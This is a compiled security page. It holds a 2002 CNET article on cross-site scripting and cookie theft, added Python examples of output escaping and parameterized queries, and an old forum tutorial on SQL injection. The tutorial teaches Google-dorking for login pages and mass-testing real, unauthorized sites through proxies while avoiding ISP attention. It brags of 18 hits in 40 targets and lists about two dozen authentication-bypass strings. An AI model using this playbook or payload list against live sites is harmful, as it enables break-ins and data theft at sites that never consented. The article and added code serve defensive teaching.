
Here's one more trick up hackers' sleeves

Even if hackers can't hijack your computer, they can still gain access to
your personal info--and your Web e-mail--through something called cross-
site scripting. Robert tells you the best way to protect yourself.

By Robert Vamosi
Senior associate editor, CNET Reviews
(7/25/02)
In the early days of the Internet, Web pages were flat. Now, they are dynamic, often
created on the fly and customized to incorporate your preferences. For example,
Travelocity offers information about travel to and from destinations you choose
each time you visit the site.

The advantages of dynamic pages are many: content is fresher, easier to maintain,
and easier to navigate. Unfortunately, some dynamic Web sites also expose you to
cross-site scripting (XSS), a method of capturing personal information that's
becoming increasingly popular with malicious users.

While buffer overflows offer malicious users a way to take control of your computer,
XSS rarely causes your system to be hijacked. Rather, XSS is an indirect way for a
malicious attacker to fool you into revealing personal information or to exploit a
secondary vulnerability on your desktop browser or within a Web site's server.

XSS allows malicious users to hijack your Web-based e-mail accounts, manipulate
your customer settings on a site, or steal information sent in cookies, which may
include your bank account, credit card, or social security number.

Let's look at cookie theft, since cookies are so widely used. Cookies are small packets of
information shared between your desktop (the client) and a Web site (the server).

Cookies are not necessarily dangerous. They allow sites such as Amazon to recognize
you when you visit the site and offer personalized recommendations for products you
may want to buy. By storing your password and ID, cookies allow you to automatically
log on to your online bank or stock-trading site. Cookies are site-specific; for example,
BigStore.com can't access your cookies from LittleStore.com, nor can a malicious user
view all the cookies stored on your desktop. Cookies for financial sites tend to be
encrypted, while those for e-commerce sites tend not to be.

For an attacker, the trick is to redirect your personal information to a third-party site
that he or she can access. One popular method is to use malicious links. Often,
these are sent in e-mail messages. They may appear to be legitimate URLs, but on
closer examination, you can see that they include malicious Web addresses.

Many of us--if we ever really look at the contents of a URL--tend to stop at the
http://, believing that any string of information following must be legit. Indeed, a
malicious URL could be coded in HEX, so http:// would become 0x0068, 0x0074,
0x0074, 0x0070, 0x003A, 0x002F, 0x002F, but otherwise, the URL would look like
the address for search-engine results.

Malicious users also trick us by hiding URLs in Web pages so that they look like
standard hotlinks--until you click the link or view the page's source code.

Another way attackers gain access to your personal information is to create a pop-
up asking you to reenter your username and password after you've already logged
on to a legitimate Web site. Your browser (and your cookie info) are then sent to a
third-party site that looks just like the legitimate one, but it's a fake that the
malicious user can access. Since your browser might recognize the spoofed site as a
trusted site--it thinks it's the same as the legit site--the malicious user could, with a
well-crafted script, run potentially damaging code on your computer.

Most attack methods these days require malicious users to be sitting at a terminal,
waiting for you to open yourself up to harm, as opposed to a virus writer, who lets
loose his or her virus and then sits back and waits days or weeks for the damage to
be done. David Endler of iDefense Labs, however, thinks this won't always be the
case. In a recent white paper (click here to download the PDF file), Endler says
future XSS exploits could easily be automated. For example, a malicious user could
set up a script that would send him or her e-mail whenever you access your Web-
based e-mail account.

So what can you do to protect yourself? You can turn off your browser's JavaScript,
but that will restrict the number of sites you can visit. You also can monitor all your
cookie transactions, accepting or denying them individually. If you use Microsoft's
Internet Explorer, you should set your security levels to High. Also, be wary of
clicking URLs from people or sites you do not know or trust. But all of these will
inconvenience you and may not even prevent an attack.

What is needed is more protection on the sites themselves, as well as better
programming and application security on the server side. The good news is that the
problem was much worse two or three years ago, when e-commerce sites were going
online overnight, with little regard for customer security.

My advice: be careful where you click, and to whom you give your username or password. The
information might not be going to the source you intended.
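The article asks for "better programming and application security on the server side" without showing what that means in code. The following is an added example, not code from the CNET article: it puts the vulnerable pattern (reflecting a user-supplied search term straight into a page) beside the hardened form (HTML-encoding the term), and issues the session cookie with the HttpOnly and Secure attributes so that a script which does get into the page cannot read the cookie through document.cookie. The search term and session id are constructed sample values; the function names are this example's own.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: a search term as an attacker-controlled query-string
# value might arrive at the server. The value is made up for this demonstration.
UNTRUSTED_TERM = "<script>alert('xss')</script>"


def render_results_unsafe(term: str) -> str:
    """The "before" form: the term is pasted into the page verbatim, so the
    browser treats any tags inside it as markup and runs any script it carries."""
    return f"<p>Results for: {term}</p>"


def render_results_safe(term: str) -> str:
    """The hardened form: HTML-encode the term before it reaches the page, so
    <, >, &, and quotes are displayed as text instead of parsed as markup."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Issue the session cookie with HttpOnly (script cannot read it via
    document.cookie) and Secure (only sent over HTTPS). Both attributes limit
    what a script injected into the page can do with the cookie."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_results_unsafe(UNTRUSTED_TERM))  # tags survive: script would run
    print(render_results_safe(UNTRUSTED_TERM))    # tags encoded: shown as text
    print(session_cookie_header("constructed-session-id"))
```

Output encoding belongs at the point where data is written into HTML, not at input time, because the same value may be safe in one context (a database column) and dangerous in another (a page). The cookie attributes are a second line of defence for when encoding is missed somewhere.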

SQL injection Basic Tutorial

One of the major problems with SQL is the poor security surrounding login and URL
strings.
This tutorial is not going to go into detail on why these strings work, as I am not a coder; I just know
what I know and it works.
If you are interested in this topic we have many articles related to SQL Injection; also, if you
would like help with the topic,
you can ask in our information security forum, where thousands of members can help you.

SEARCH:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from...finding
one that's vulnerable is another question.

WHAT I DO:
First let me go into details on how I go about my research.
I have gathered plenty of injection strings for quite some time, like those below, and have just
been granted access to a test machine and will be testing for many variations and new
inputs...legally, cool...provided by my good friend Gsecur aka ICE, also an Astal member,
http://governmentsecurity.org "thanks mate"...gives me a chance to concentrate on what I'm
doing and not be looking over my shoulder.

INJECTION STRINGS: HOW?

This is the easiest part...very simple.

On the login page just enter something like

user:admin (you don't even have to put this.)


pass:' or 1=1--
or

user:' or 1=1--
admin:' or 1=1--

Some sites will have just a password, so

password:' or 1=1--

In fact I have compiled a combo list with strings like this to use on my chosen targets....there are
plenty of strings about; the list below is a sample of the most commonly used.

There are many other strings involving, for instance, UNION table access via reading the error
pages' table structure;
thus an attack with this method will eventually reveal admin U\P paths...but that's another paper.

The ones I am interested in are quick access to targets.


PROGRAM
I tried several programs to use with these search strings and up to now only Ares has performed
well, with quite a bit
of success with a combo list formatted this way; yesterday I loaded 40 eastern targets with 18
positive hits in a few minutes.

How long would it take to go through 40 sites cutting and pasting each string??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it doesn't have to be admin, it can be anything you want...the most important part is
example:' or 1=1-- this is our injection

string

Now the only trudge part is finding targets to exploit...so I tend to search, say, Google for login.asp
or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets; trying various searches spews out plenty more.

Now, using proxies set in my browser, I then click through interesting targets...seeing what's what
on the site pages; if interesting
I then cut and paste the URL as a possible target...after an hour or so you have a list of potential
targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...the reason I don't select all results or
spider for login pages is
I want to keep the noise level low...my ISP..well, enough said...plus atm I'm on dial-up, so too slow
for me.

I then save the list, fire up Ares and enter (1) a proxy list, (2) my target IP list, (3) my combo
list...start..now I don't want to go into
problems with users using Ares..the thing is I know it works for me...

Sit back and wait...any target vulnerable will show up in the hits box...now when it finds a target
it will spew all the strings on that site as vulnerable...you have to go through each one on the site

by cutting and pasting the string till you find the right one..but the thing is you
know you CAN access the site...really I need a program that will return the hit with a click on the
URL and ignore false outputs.

I'm still looking....the thing is it saves quite a bit of time going to each site and each
string to find it's not exploitable.

There you go, you should have access to your vulnerable target by now.

Another thing: you can use the strings in URLs where user=? Edit the URL to the = part and paste '
or 1=1-- so it becomes

user=' or 1=1-- just as quick as the login process.

(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --
' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

ComSec aka ZSL
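The tutorial above says it will not explain why the strings work. The following is an added example, not code from the tutorial's author: it builds a one-row users table in an in-memory SQLite database (constructed sample data), runs a login query the way a vulnerable page does (splicing the input into the SQL text) and the way a fixed page does (binding the input as a parameter), and feeds both the same two strings from the list above. The vulnerable form returns the admin row for either string; the parameterized form returns nothing, because the quote and the `--` comment marker are compared as plain characters and never reach the SQL parser. Function names are this example's own.

```python
import sqlite3

# Two of the strings from the tutorial's list; they are the inputs under test.
TAUTOLOGY = "' or 1=1--"
COMMENT_OUT = "admin'--"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table holding one sample account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'sample-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The "before" form: input is spliced into the SQL text. A quote in the
    input closes the literal early, "or 1=1" makes the WHERE clause true for
    every row, and "--" comments out the rest of the statement. Returns the
    matched username, or None."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str):
    """The hardened form: placeholders bind the input as data, so quotes and
    comment markers are compared literally and never alter the query."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run both login forms against the same inputs and return the results."""
    conn = make_db()
    return {
        "tautology_vulnerable": login_vulnerable(conn, "anyone", TAUTOLOGY),
        "tautology_hardened": login_parameterized(conn, "anyone", TAUTOLOGY),
        "comment_vulnerable": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "comment_hardened": login_parameterized(conn, COMMENT_OUT, "wrong"),
        "real_credentials": login_parameterized(conn, "admin", "sample-secret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The fix is the same in every language and database driver: never build the statement from user input with string formatting; use the driver's placeholder syntax (`?`, `%s`, `:name`, depending on the driver) and pass the values separately. On the detection side, a login form that accepts a password containing a quote and a comment marker, or that returns a database error for such input, is the symptom to look for in testing and in server logs.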
